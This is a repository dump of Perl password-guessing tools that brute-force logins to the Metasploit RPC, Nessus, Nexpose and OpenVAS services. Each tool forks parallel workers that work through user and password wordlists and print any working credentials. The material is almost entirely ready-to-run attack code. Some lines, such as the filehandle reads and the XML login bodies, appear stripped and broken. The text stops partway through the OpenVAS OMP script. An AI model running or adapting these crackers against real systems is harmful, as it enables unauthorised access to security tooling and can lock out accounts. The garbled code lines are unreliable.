├── README ├── TODO ├── metasploit-rpc-pwcrack.pl ├── nessus-ntp-pwcrack.pl ├── nessus-xmlrpc-pwcrack.pl ├── nexpose-pwcrack.pl ├── openvas-omp-pwcrack.pl └── openvas-otp-pwcrack.pl /README: -------------------------------------------------------------------------------- 1 | Password crackers for popular vulnerability scanners. 2 | Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL. 3 | NSE scripts are released under the Nmap Public License. 4 | 5 | Find the password for your favourite vulnerability scanner: 6 | - OpenVAS 7 | - Nessus 8 | - NeXpose 9 | and exploitation frameworks: 10 | - Metasploit XMLRPC 11 | 12 | Regarding NSE scripts: 13 | - All the scripts are now part of nmap (so I suggest using the 14 | versions found in nmap) and have therefore been removed from HEAD 15 | (you can still get them through git history if you need them for 16 | any strange reason) 17 | - You have to enable version detection (-sV) 18 | - You have to force Nmap to use SSL for XMLRPC guessing in 19 | Nessus 20 | -------------------------------------------------------------------------------- /TODO: -------------------------------------------------------------------------------- 1 | ALL: 2 | - encode XML entities 3 | - support for both SSL and non-SSL sockets 4 | 5 | metasploit: 6 | - benchmark which number of threads is fastest 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /metasploit-rpc-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Metasploit XMLRPC password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. 
Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | my $verbose = 0; 10 | my $mx_host = "localhost"; 11 | my $mx_port = "55553"; 12 | my $timeout = 15; 13 | my $userfile; 14 | my $passfile; 15 | my $maxreq = 16; 16 | my $usessl = 0; 17 | my $rpc = "msgpack"; 18 | my $uri = "/api/"; 19 | 20 | my @childs; 21 | my $ch=0; 22 | my $total=0; 23 | 24 | my $pid = 1; 25 | my $loop = 1; 26 | my $skipsslcheck = 0; 27 | 28 | 29 | Getopt::Long::Configure ("bundling"); 30 | 31 | my $result = GetOptions ( 32 | "i|ip=s" => \$mx_host, 33 | "p|port=i" => \$mx_port, 34 | "U|users=s" => \$userfile, 35 | "P|passwords=s" => \$passfile, 36 | "k|skipsslcheck" => \$skipsslcheck, 37 | "m|maxreq=i" => \$maxreq, 38 | "t|timeout=i" => \$timeout, 39 | "u|uri=s" => \$uri, 40 | "v|verbose+" => \$verbose, 41 | "s|ssl" => \$usessl, 42 | "r|rpc=s" => \$rpc, 43 | "h|help" => \&help 44 | ); 45 | 46 | $rpc = lc($rpc); 47 | 48 | unless ($userfile and $passfile) { 49 | help(); 50 | } 51 | 52 | print STDERR "Metasploit XMLRPC password cracker. (C) Kost. Distributed under GPL.\n\n"; 53 | 54 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 55 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 56 | 57 | my $userglob = ; 58 | chomp $userglob; 59 | 60 | my $mp; 61 | my $url; 62 | my $agent; 63 | 64 | if ($rpc eq "msgpack") { 65 | use Data::MessagePack; 66 | use LWP; 67 | use HTTP::Request; 68 | 69 | $mp = Data::MessagePack->new(); 70 | $url = ($usessl ? "https" : "http") . "://" . $mx_host . ":" . $mx_port . 
$uri; 71 | $agent = LWP::UserAgent->new ( 72 | ssl_opts => { 73 | verify_hostname => (not $skipsslcheck), 74 | } 75 | ); 76 | } 77 | 78 | $SIG{INT} = \&ctrlc; 79 | my %comb; 80 | 81 | print STDERR "[i] Cracking.\n"; 82 | my $starttime=time(); 83 | 84 | while ($loop) { 85 | if ($pid) { 86 | # print STDERR "Main/Parent\n"; 87 | %comb = getcomb(); 88 | 89 | if ($comb{'nomore'} == 1) { 90 | $loop = 0; 91 | next; 92 | } 93 | if ($ch<$maxreq) { 94 | $ch++; 95 | # print STDERR "Forking $ch\n"; 96 | $pid = fork(); 97 | die ("[e] cannot fork: $!") if (!defined($pid)); 98 | if ($pid) { 99 | push @childs, $pid; 100 | $total++; 101 | } 102 | } else { 103 | # wait for children to die 104 | while ($#childs>0) { 105 | #print STDERR "waiting to die\n"; 106 | if (my $oldpid=waitpid(-1, 0)) { 107 | # print STDERR "Oldpid: $oldpid\n"; 108 | foreach my $i (0 .. $#childs) { 109 | next if ($oldpid); 110 | if ($childs[$i] eq $oldpid) { 111 | delete $childs[$i]; 112 | last; 113 | } 114 | } 115 | $total++; 116 | $pid = fork(); 117 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 118 | if ($pid) { 119 | push @childs, $pid; 120 | last if ($loop==0); 121 | } else { 122 | last;# if children skip while loop 123 | 124 | } 125 | last; 126 | } 127 | } 128 | if ($pid) {%comb = getcomb();} 129 | next; 130 | } 131 | } 132 | unless ($pid) { 133 | # children 134 | # print STDERR "Children\n"; 135 | if ($rpc eq "msgpack") { 136 | mx_msgpack_guess($comb{'user'},$comb{'pass'}); 137 | } else { 138 | mx_guess($comb{'user'},$comb{'pass'}); 139 | } 140 | exit(0); 141 | } 142 | } 143 | 144 | $SIG{'INT'} = 'DEFAULT'; 145 | foreach (@childs) { 146 | waitpid($_, 0) 147 | } 148 | 149 | my $endtime = time(); 150 | my $difftime = $endtime - $starttime; 151 | 152 | print STDERR "\n"; 153 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 154 | print STDERR "[i] END\n"; 155 | 156 | sub getcomb { 157 | my %comb; 158 | while (1) { 159 | unless ($comb{'pass'} = ) { 160 | while (1) { 161 | 
unless ($comb{'user'} = ) { 162 | $comb{'nomore'} = 1; 163 | return %comb; 164 | } else { 165 | chomp($comb{'user'}); 166 | if ($comb{'user'} eq '') { 167 | next; 168 | } else { 169 | $userglob=$comb{'user'}; 170 | seek (PASS,0,0); 171 | last; 172 | } 173 | } 174 | } 175 | } else { 176 | $comb{'user'}=$userglob; 177 | chomp($comb{'pass'}); 178 | if ($comb{'pass'} eq '') { 179 | next; 180 | } else { 181 | last 182 | } 183 | } 184 | } 185 | $comb{'nomore'} = 0; 186 | return %comb; 187 | } 188 | 189 | sub ctrlc { 190 | $SIG{INT} = \&ctrlc; 191 | print "\nCTRL+C presssed, stopping.\n"; 192 | $loop=0; 193 | } 194 | 195 | sub mx_msgpack_guess { 196 | my ($user, $password) = @_; 197 | 198 | my @rapack = ('auth.login',$user,$password); 199 | 200 | my $req = new HTTP::Request('POST',$url); 201 | print STDERR "[i] Combination $user:$password: Connecting to $url\n" if ($verbose>2); 202 | $req->content_type('binary/message-pack'); 203 | my $mp = Data::MessagePack->new(); 204 | $req->content($mp->pack(\@rapack)); 205 | my $res = $agent->request($req); 206 | 207 | if ($res->code != 200) { 208 | print STDERR "[i] Combination $user:$password: Expected 200 response, got ".$res->code." Maybe you want to skip SSL check? is it really MSF?\n"; 209 | print STDERR "[i] Combination $user:$password: Response got: ".$res->content."\n" if ($verbose>3); 210 | return; 211 | } 212 | 213 | my $response = $mp->unpack($res->content); 214 | if ($response->{'result'} eq 'success') { 215 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 216 | print "[o] Success! 
User: $user and Password: $password\n"; 217 | } else { 218 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 219 | } 220 | } 221 | 222 | sub mx_guess { 223 | my ($user, $password) = @_; 224 | my $mx_sock; 225 | if ($usessl) { 226 | $mx_sock = IO::Socket::SSL->new( 227 | PeerAddr => $mx_host, 228 | PeerPort => $mx_port, 229 | SSL_verify_mode => 0, 230 | Timeout => $timeout 231 | ); 232 | } else { 233 | $mx_sock = IO::Socket::SSL->new( 234 | PeerAddr => $mx_host, 235 | PeerPort => $mx_port, 236 | Timeout => $timeout 237 | ); 238 | } 239 | if(!$mx_sock) { 240 | warn ("[w] Cannot connect to sock: $!"); 241 | return; 242 | } 243 | $mx_sock->autoflush(); 244 | 245 | my $xmldata='auth.login'.$user.''.$password.''."\n\x00"; 246 | print STDERR "[d] Sending login data: " if ($verbose>3); 247 | $mx_sock->print($xmldata); 248 | print STDERR "done!\n" if ($verbose>3); 249 | 250 | print STDERR "[d] Waiting for answer line: " if ($verbose>3); 251 | my $line = $mx_sock->getline; 252 | print STDERR "done!\n" if ($verbose>3); 253 | 254 | unless ($mx_sock->connected) { 255 | print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0); 256 | } 257 | 258 | if($line =~ /faultString<\/name>authentication error<\/string><\/value>/gis) { 259 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 260 | } elsif ($line =~ /result<\/name>success<\/string>/gis) { 261 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 262 | print "[o] Success! User: $user and Password: $password\n"; 263 | } else { 264 | print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0); 265 | } 266 | 267 | if ($usessl) { 268 | $mx_sock->close(SSL_ctx_free => 1); 269 | } else { 270 | $mx_sock->close(); 271 | } 272 | } 273 | 274 | sub help 275 | { 276 | print "$0: Metasploit XMLRPC password cracker. \n"; 277 | print "Copyright (C) Vlatko Kosturjak, Kost. 
Distributed under GPL.\n\n"; 278 | print "Usage: $0 -s -i 127.0.0.1 -p 55553 -U userlist.txt -P passlist.txt\n\n"; 279 | print " -i Use hostname or IP (default: $mx_host)\n"; 280 | print " -p

Use port

(default: $mx_port)\n"; 281 | print " -U Use user list \n"; 282 | print " -P

Use password list

\n"; 283 | print " -s use SSL\n"; 284 | print " -k skip SSL certificate check\n"; 285 | print " -r use RPC style interface : msgpack or oldrpc (default: $rpc)\n"; 286 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 287 | print " -t use sock timeout \n"; 288 | print " -v verbose (-vv will display every combination tried)\n"; 289 | print " -h this help message\n"; 290 | exit (0); 291 | } 292 | -------------------------------------------------------------------------------- /nessus-ntp-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Nessus NTP password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | my $verbose = 0; 10 | my $ov_host = "localhost"; 11 | my $ov_port = "9390"; 12 | my $ov_hello = "< NTP/1.0 >\n"; 13 | my $timeout = 15; 14 | my $userfile; 15 | my $passfile; 16 | my $maxreq = 16; 17 | 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | Getopt::Long::Configure ("bundling"); 26 | 27 | my $result = GetOptions ( 28 | "i|ip=s" => \$ov_host, 29 | "p|port=i" => \$ov_port, 30 | "U|users=s" => \$userfile, 31 | "P|passwords=s" => \$passfile, 32 | "m|maxreq=i" => \$maxreq, 33 | "t|timeout=i" => \$timeout, 34 | "v|verbose+" => \$verbose, 35 | "h|help" => \&help 36 | ); 37 | 38 | unless ($userfile and $passfile) { 39 | help(); 40 | } 41 | 42 | print STDERR "Nessus NTP password cracker. (C) Kost. 
Distributed under GPL.\n\n"; 43 | 44 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 45 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 46 | 47 | my $userglob = ; 48 | chomp $userglob; 49 | 50 | $SIG{INT} = \&ctrlc; 51 | my %comb; 52 | 53 | print STDERR "[i] Cracking.\n"; 54 | my $starttime=time(); 55 | 56 | while ($loop) { 57 | if ($pid) { 58 | # print STDERR "Main/Parent\n"; 59 | %comb = getcomb(); 60 | 61 | if ($comb{'nomore'} == 1) { 62 | $loop = 0; 63 | next; 64 | } 65 | if ($ch<$maxreq) { 66 | $ch++; 67 | # print STDERR "Forking $ch\n"; 68 | $pid = fork(); 69 | die ("[e] cannot fork: $!") if (!defined($pid)); 70 | if ($pid) { 71 | push @childs, $pid; 72 | $total++; 73 | } 74 | } else { 75 | # wait for children to die 76 | while ($#childs>0) { 77 | #print STDERR "waiting to die\n"; 78 | if (my $oldpid=waitpid(-1, 0)) { 79 | # print STDERR "Oldpid: $oldpid\n"; 80 | foreach my $i (0 .. $#childs) { 81 | next if ($oldpid); 82 | if ($childs[$i] eq $oldpid) { 83 | delete $childs[$i]; 84 | last; 85 | } 86 | } 87 | $total++; 88 | $pid = fork(); 89 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 90 | if ($pid) { 91 | push @childs, $pid; 92 | last if ($loop==0); 93 | } else { 94 | last;# if children skip while loop 95 | 96 | } 97 | last; 98 | } 99 | } 100 | if ($pid) {%comb = getcomb();} 101 | next; 102 | } 103 | } 104 | unless ($pid) { 105 | # children 106 | # print STDERR "Children\n"; 107 | ov_guess($comb{'user'},$comb{'pass'}); 108 | exit(0); 109 | } 110 | } 111 | 112 | $SIG{'INT'} = 'DEFAULT'; 113 | foreach (@childs) { 114 | waitpid($_, 0) 115 | } 116 | 117 | my $endtime = time(); 118 | my $difftime = $endtime - $starttime; 119 | 120 | print STDERR "\n"; 121 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 122 | print STDERR "[i] END\n"; 123 | 124 | sub getcomb { 125 | my %comb; 126 | while (1) { 127 | unless ($comb{'pass'} = ) { 128 | while (1) { 129 | unless ($comb{'user'} = 
) { 130 | $comb{'nomore'} = 1; 131 | return %comb; 132 | } else { 133 | chomp($comb{'user'}); 134 | if ($comb{'user'} eq '') { 135 | next; 136 | } else { 137 | $userglob=$comb{'user'}; 138 | seek (PASS,0,0); 139 | last; 140 | } 141 | } 142 | } 143 | } else { 144 | $comb{'user'}=$userglob; 145 | chomp($comb{'pass'}); 146 | if ($comb{'pass'} eq '') { 147 | next; 148 | } else { 149 | last 150 | } 151 | } 152 | } 153 | $comb{'nomore'} = 0; 154 | return %comb; 155 | } 156 | 157 | sub ctrlc { 158 | $SIG{INT} = \&ctrlc; 159 | print "\nCTRL+C presssed, stopping.\n"; 160 | $loop=0; 161 | } 162 | 163 | sub ov_guess { 164 | my ($user, $password) = @_; 165 | my $ov_sock = IO::Socket::SSL->new( 166 | PeerAddr => $ov_host, 167 | PeerPort => $ov_port, 168 | SSL_verify_mode => 0, 169 | Timeout => $timeout 170 | ); 171 | if(!$ov_sock) { 172 | warn ("[w] Cannot connect to sock: $!"); 173 | return; 174 | } 175 | $ov_sock->autoflush(); 176 | 177 | $ov_sock->print($ov_hello); 178 | my $line = $ov_sock->getline; 179 | 180 | if(!defined($line)) { 181 | $ov_sock->close(SSL_ctx_free => 1); 182 | warn ("[w] Hmm. No answer. Is it Nessus server or TCP wrapped ?"); 183 | return; 184 | } 185 | 186 | if($line eq $ov_hello) { 187 | print STDERR "[d] Handshake OK\n" if ($verbose>3); 188 | } else { 189 | $ov_sock->close(SSL_ctx_free => 1); 190 | warn ("[w] Hmm. Strange answer. Is it Nessus server?"); 191 | return; 192 | } 193 | 194 | print STDERR "[d] Sending login data: " if ($verbose>3); 195 | $ov_sock->print($user ."\n"); 196 | $ov_sock->print($password . 
"\n"); 197 | print STDERR "done!\n" if ($verbose>3); 198 | 199 | print STDERR "[d] Waiting for answer line: " if ($verbose>3); 200 | $line = $ov_sock->getline; 201 | print STDERR "done!\n" if ($verbose>3); 202 | 203 | unless ($ov_sock->connected) { 204 | print STDERR "[i] Combination $user:$password: Disconnected\n" if ($verbose>0); 205 | } 206 | 207 | if($line =~ /Bad login/gis) { 208 | print STDERR "[i] Combination $user:$password: Wrong\n" if ($verbose>1); 209 | } elsif ($line =~ /SERVER <|>.*<|> SERVER/gis) { 210 | print STDERR "[i] Combination $user:$password: Sucess\n" if ($verbose>1); 211 | print "[o] Success! User: $user and Password: $password\n"; 212 | } else { 213 | print STDERR "[i] Combination $user:$password: Unknown\n" if ($verbose>0); 214 | } 215 | 216 | $ov_sock->close(SSL_ctx_free => 1); 217 | } 218 | 219 | sub help 220 | { 221 | print "$0: Nessus NTP password cracker. \n"; 222 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 223 | print "Usage: $0 -i 127.0.0.1 -p 9390 -U userlist.txt -P passlist.txt\n\n"; 224 | print " -i Use hostname or IP (default: $ov_host)\n"; 225 | print " -p

Use port

(default: $ov_port)\n"; 226 | print " -U Use user list \n"; 227 | print " -P

Use password list

\n"; 228 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 229 | print " -t use sock timeout \n"; 230 | print " -v verbose (-vv will display every combination tried)\n"; 231 | print " -h this help message\n"; 232 | exit (0); 233 | } 234 | -------------------------------------------------------------------------------- /nessus-xmlrpc-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Nessus XMLRPC password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL. 4 | 5 | use strict; 6 | 7 | use Getopt::Long; 8 | use LWP::UserAgent; 9 | use HTTP::Request::Common; 10 | 11 | my $nessus_url = "https://localhost:8834/login"; 12 | my $verbose = 0; 13 | my $debug = 0; 14 | my $userfile; 15 | my $passfile; 16 | 17 | my $maxreq = 16; 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | my $result = GetOptions ( 26 | "u|url=s" => \$nessus_url, 27 | "U|users=s" => \$userfile, 28 | "P|passwords=s" => \$passfile, 29 | "m|maxreq=i" => \$maxreq, 30 | "v|verbose" => \$verbose, 31 | "d|debug" => \$debug, 32 | "h|help" => \&help 33 | ); 34 | 35 | unless ($userfile and $passfile) { 36 | help(); 37 | } 38 | 39 | print STDERR "Nessus XMLRPC password cracker. (C) Kost. 
Distributed under GPL.\n\n"; 40 | 41 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 42 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 43 | 44 | my $userglob = ; 45 | chomp $userglob; 46 | 47 | $SIG{INT} = \&ctrlc; 48 | my %comb; 49 | 50 | print STDERR "[i] Cracking.\n"; 51 | my $starttime=time(); 52 | 53 | while ($loop) { 54 | if ($pid) { 55 | # print STDERR "Main/Parent\n"; 56 | %comb = getcomb(); 57 | 58 | if ($comb{'nomore'} == 1) { 59 | $loop = 0; 60 | next; 61 | } 62 | if ($ch<$maxreq) { 63 | $ch++; 64 | # print STDERR "Forking $ch\n"; 65 | $pid = fork(); 66 | die ("[e] cannot fork: $!") if (!defined($pid)); 67 | if ($pid) { 68 | push @childs, $pid; 69 | $total++; 70 | } 71 | } else { 72 | # wait for children to die 73 | while ($#childs>0) { 74 | #print STDERR "waiting to die\n"; 75 | if (my $oldpid=waitpid(-1, 0)) { 76 | # print STDERR "Oldpid: $oldpid\n"; 77 | foreach my $i (0 .. $#childs) { 78 | next if ($oldpid); 79 | if ($childs[$i] eq $oldpid) { 80 | delete $childs[$i]; 81 | last; 82 | } 83 | } 84 | $total++; 85 | $pid = fork(); 86 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 87 | if ($pid) { 88 | push @childs, $pid; 89 | last if ($loop==0); 90 | } else { 91 | last;# if children skip while loop 92 | 93 | } 94 | last; 95 | } 96 | } 97 | if ($pid) {%comb = getcomb();} 98 | next; 99 | } 100 | } 101 | unless ($pid) { 102 | # children 103 | # print STDERR "Children\n"; 104 | guess($comb{'user'},$comb{'pass'}); 105 | exit(0); 106 | } 107 | } 108 | 109 | $SIG{'INT'} = 'DEFAULT'; 110 | foreach (@childs) { 111 | waitpid($_, 0) 112 | } 113 | 114 | my $endtime = time(); 115 | my $difftime = $endtime - $starttime; 116 | 117 | print STDERR "\n"; 118 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 119 | print STDERR "[i] END\n"; 120 | 121 | sub getcomb { 122 | my %comb; 123 | while (1) { 124 | unless ($comb{'pass'} = ) { 125 | while (1) { 126 | unless ($comb{'user'} = ) { 
127 | $comb{'nomore'} = 1; 128 | return %comb; 129 | } else { 130 | chomp($comb{'user'}); 131 | if ($comb{'user'} eq '') { 132 | next; 133 | } else { 134 | $userglob=$comb{'user'}; 135 | seek (PASS,0,0); 136 | last; 137 | } 138 | } 139 | } 140 | } else { 141 | $comb{'user'}=$userglob; 142 | chomp($comb{'pass'}); 143 | if ($comb{'pass'} eq '') { 144 | next; 145 | } else { 146 | last 147 | } 148 | } 149 | } 150 | $comb{'nomore'} = 0; 151 | return %comb; 152 | } 153 | 154 | sub ctrlc { 155 | $SIG{INT} = \&ctrlc; 156 | print "\nCTRL+C presssed, stopping.\n"; 157 | $loop=0; 158 | } 159 | 160 | sub guess { 161 | my ($user, $password) = @_; 162 | 163 | my $post_data = { login => $user, password => $password }; 164 | 165 | my $ua = LWP::UserAgent->new; 166 | my $request = POST $nessus_url, $post_data; 167 | 168 | if ($debug) { 169 | $ua->add_handler("request_send", sub { shift->dump; return }); 170 | $ua->add_handler("response_done", sub { shift->dump; return }); 171 | } 172 | 173 | my $result = $ua->request($request); 174 | if ($result->is_success) { 175 | if ($result->content =~ /Invalid login<\/contents>/) { 176 | print STDERR "[i] Trying $user:$password: Wrong\n" if ($verbose); 177 | } elsif ($result->content =~ /OK<\/status>/) { 178 | print STDERR "[i] Trying $user:$password: Success\n" if ($verbose); 179 | print "[o] Success! User: $user and Password: $password\n"; 180 | } else { 181 | print STDERR "[i] Trying $user:$password: Unknown\n" if ($verbose); 182 | } 183 | } else { 184 | print STDERR "[i] Trying $user:$password: Cannot login! Check your URL of Nessus!\n"; 185 | } 186 | } 187 | 188 | sub help 189 | { 190 | print "$0: Nessus XMLRPC password cracker. \n"; 191 | print "Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL.\n\n"; 192 | print "Usage: $0 -u https://localhost:8834/login -U userlist.txt -P passlist.txt\n\n"; 193 | print " -u use for URL for Nessus login (default: $nessus_url)\n"; 194 | print " -U Use user list \n"; 195 | print " -P

Use password list

\n"; 196 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 197 | print " -v verbose\n"; 198 | print " -d debug (be very verbose)\n"; 199 | print " -h this help message\n"; 200 | print "\n"; 201 | exit (0); 202 | } 203 | -------------------------------------------------------------------------------- /nexpose-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # Nexpose password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL. 4 | 5 | use strict; 6 | 7 | use Getopt::Long; 8 | use LWP::UserAgent; 9 | use HTTP::Request::Common; 10 | 11 | my $nexpose_url = "https://localhost:3780/api/1.1/xml"; 12 | my $verbose = 0; 13 | my $debug = 0; 14 | my $userfile; 15 | my $passfile; 16 | 17 | my $maxreq = 16; 18 | my @childs; 19 | my $ch=0; 20 | my $total=0; 21 | 22 | my $pid = 1; 23 | my $loop = 1; 24 | 25 | my $result = GetOptions ( 26 | "u|url=s" => \$nexpose_url, 27 | "U|users=s" => \$userfile, 28 | "P|passwords=s" => \$passfile, 29 | "m|maxreq=i" => \$maxreq, 30 | "v|verbose" => \$verbose, 31 | "d|debug" => \$debug, 32 | "h|help" => \&help 33 | ); 34 | 35 | unless ($userfile and $passfile) { 36 | help(); 37 | } 38 | 39 | print STDERR "Nexpose password cracker. (C) Kost. 
Distributed under GPL.\n\n"; 40 | 41 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 42 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 43 | 44 | my $userglob = ; 45 | chomp $userglob; 46 | 47 | $SIG{INT} = \&ctrlc; 48 | my %comb; 49 | 50 | print STDERR "[i] Cracking.\n"; 51 | my $starttime=time(); 52 | 53 | while ($loop) { 54 | if ($pid) { 55 | # print STDERR "Main/Parent\n"; 56 | %comb = getcomb(); 57 | 58 | if ($comb{'nomore'} == 1) { 59 | $loop = 0; 60 | next; 61 | } 62 | if ($ch<$maxreq) { 63 | $ch++; 64 | # print STDERR "Forking $ch\n"; 65 | $pid = fork(); 66 | die ("[e] cannot fork: $!") if (!defined($pid)); 67 | if ($pid) { 68 | push @childs, $pid; 69 | $total++; 70 | } 71 | } else { 72 | # wait for children to die 73 | while ($#childs>0) { 74 | #print STDERR "waiting to die\n"; 75 | if (my $oldpid=waitpid(-1, 0)) { 76 | # print STDERR "Oldpid: $oldpid\n"; 77 | foreach my $i (0 .. $#childs) { 78 | next if ($oldpid); 79 | if ($childs[$i] eq $oldpid) { 80 | delete $childs[$i]; 81 | last; 82 | } 83 | } 84 | $total++; 85 | $pid = fork(); 86 | die ("[e] cannot fork in wait: $!") if (!defined($pid)); 87 | if ($pid) { 88 | push @childs, $pid; 89 | last if ($loop==0); 90 | } else { 91 | last;# if children skip while loop 92 | 93 | } 94 | last; 95 | } 96 | } 97 | if ($pid) {%comb = getcomb();} 98 | next; 99 | } 100 | } 101 | unless ($pid) { 102 | # children 103 | # print STDERR "Children\n"; 104 | guess($comb{'user'},$comb{'pass'}); 105 | exit(0); 106 | } 107 | } 108 | 109 | $SIG{'INT'} = 'DEFAULT'; 110 | foreach (@childs) { 111 | waitpid($_, 0) 112 | } 113 | 114 | my $endtime = time(); 115 | my $difftime = $endtime - $starttime; 116 | 117 | print STDERR "\n"; 118 | print STDERR "[i] Statistics: $total tries in $difftime seconds.\n"; 119 | print STDERR "[i] END\n"; 120 | 121 | sub getcomb { 122 | my %comb; 123 | while (1) { 124 | unless ($comb{'pass'} = ) { 125 | while (1) { 126 | unless ($comb{'user'} = ) { 
127 | $comb{'nomore'} = 1; 128 | return %comb; 129 | } else { 130 | chomp($comb{'user'}); 131 | if ($comb{'user'} eq '') { 132 | next; 133 | } else { 134 | $userglob=$comb{'user'}; 135 | seek (PASS,0,0); 136 | last; 137 | } 138 | } 139 | } 140 | } else { 141 | $comb{'user'}=$userglob; 142 | chomp($comb{'pass'}); 143 | if ($comb{'pass'} eq '') { 144 | next; 145 | } else { 146 | last 147 | } 148 | } 149 | } 150 | $comb{'nomore'} = 0; 151 | return %comb; 152 | } 153 | 154 | sub ctrlc { 155 | $SIG{INT} = \&ctrlc; 156 | print "\nCTRL+C presssed, stopping.\n"; 157 | $loop=0; 158 | } 159 | 160 | sub guess { 161 | my ($user, $password) = @_; 162 | 163 | my $post_data = ''; 164 | 165 | my $ua = LWP::UserAgent->new; 166 | my $request = POST $nexpose_url, 'Content-Type'=>'text/xml', Content=>$post_data; 167 | 168 | if ($debug) { 169 | $ua->add_handler("request_send", sub { shift->dump; return }); 170 | $ua->add_handler("response_done", sub { shift->dump; return }); 171 | } 172 | 173 | my $result = $ua->request($request); 174 | if ($result->is_success) { 175 | if ($result->content =~ /LoginResponse.*success="0"/) { 176 | print STDERR "[i] Trying $user:$password: Wrong\n" if ($verbose); 177 | } elsif ($result->content =~ /LoginResponse.*success="1"/) { 178 | print STDERR "[i] Trying $user:$password: Success\n" if ($verbose); 179 | print "[o] Success! User: $user and Password: $password\n"; 180 | } else { 181 | print STDERR "[i] Trying $user:$password: Unknown\n" if ($verbose); 182 | } 183 | } else { 184 | print STDERR "[i] Trying $user:$password: Cannot login! Check your URL of Nexpose!\n"; 185 | } 186 | } 187 | 188 | sub help 189 | { 190 | print "$0: Nexpose password cracker. \n"; 191 | print "Copyright (C) Vlatko Kosturjak, Kost. 
Distributed under GPL.\n\n"; 192 | print "Usage: $0 -u https://localhost:3780/api/1.1/xml -U userlist.txt -P passlist.txt\n\n"; 193 | print " -u use for URL for Nexpose API (default: $nexpose_url)\n"; 194 | print " -U Use user list \n"; 195 | print " -P

Use password list

\n"; 196 | print " -m Maximum number of parallel request (default: $maxreq)\n"; 197 | print " -v verbose\n"; 198 | print " -d debug (be very verbose)\n"; 199 | print " -h this help message\n"; 200 | print "\n"; 201 | print "Note: Nexpose will lock accounts by default! Make sure you know what you're doing!\n"; 202 | exit (0); 203 | } 204 | -------------------------------------------------------------------------------- /openvas-omp-pwcrack.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | # OpenVAS OMP password cracker 3 | # Copyright (C) Vlatko Kosturjak, Kost. Distributed under GPL 4 | 5 | use strict; 6 | use IO::Socket::SSL; 7 | use Getopt::Long; 8 | 9 | $!=1; 10 | 11 | my $verbose = 0; 12 | my $ov_host = "localhost"; 13 | my $ov_port = "9390"; 14 | my $timeout = 30; 15 | my $userfile; 16 | my $passfile; 17 | my $maxreq = 16; 18 | 19 | my @childs; 20 | my $ch=0; 21 | my $total=0; 22 | 23 | my $pid = 1; 24 | my $loop = 1; 25 | 26 | Getopt::Long::Configure ("bundling"); 27 | 28 | my $result = GetOptions ( 29 | "i|ip=s" => \$ov_host, 30 | "p|port=i" => \$ov_port, 31 | "U|users=s" => \$userfile, 32 | "P|passwords=s" => \$passfile, 33 | "m|maxreq=i" => \$maxreq, 34 | "t|timeout=i" => \$timeout, 35 | "v|verbose+" => \$verbose, 36 | "h|help" => \&help 37 | ); 38 | 39 | unless ($userfile and $passfile) { 40 | help(); 41 | } 42 | 43 | print STDERR "OpenVAS OMP password cracker. (C) Kost. 
Distributed under GPL.\n\n"; 44 | 45 | open(USER,"<$userfile") or die ("cannot open user file $userfile: $!"); 46 | open(PASS,"<$passfile") or die ("cannot open password file $passfile: $!"); 47 | 48 | my $userglob = ; 49 | chomp $userglob; 50 | 51 | $SIG{INT} = \&ctrlc; 52 | my %comb; 53 | 54 | print STDERR "[i] Cracking.\n"; 55 | my $starttime=time(); 56 | 57 | while ($loop) { 58 | if ($pid) { 59 | # print STDERR "Main/Parent\n"; 60 | %comb = getcomb(); 61 | 62 | if ($comb{'nomore'} == 1) { 63 | $loop = 0; 64 | next; 65 | } 66 | if ($ch<$maxreq) { 67 | $ch++; 68 | # print STDERR "Forking $ch\n"; 69 | $pid = fork(); 70 | die ("[e] cannot fork: $!") if (!defined($pid)); 71 | if ($pid) { 72 | push @childs, $pid; 73 | $total++; 74 | } 75 | } else { 76 | # wait for children to die 77 | while ($#childs>0) { 78 | #print STDERR "waiting to die\n"; 79 | if (my $oldpid=waitpid(-1, 0)) { 80 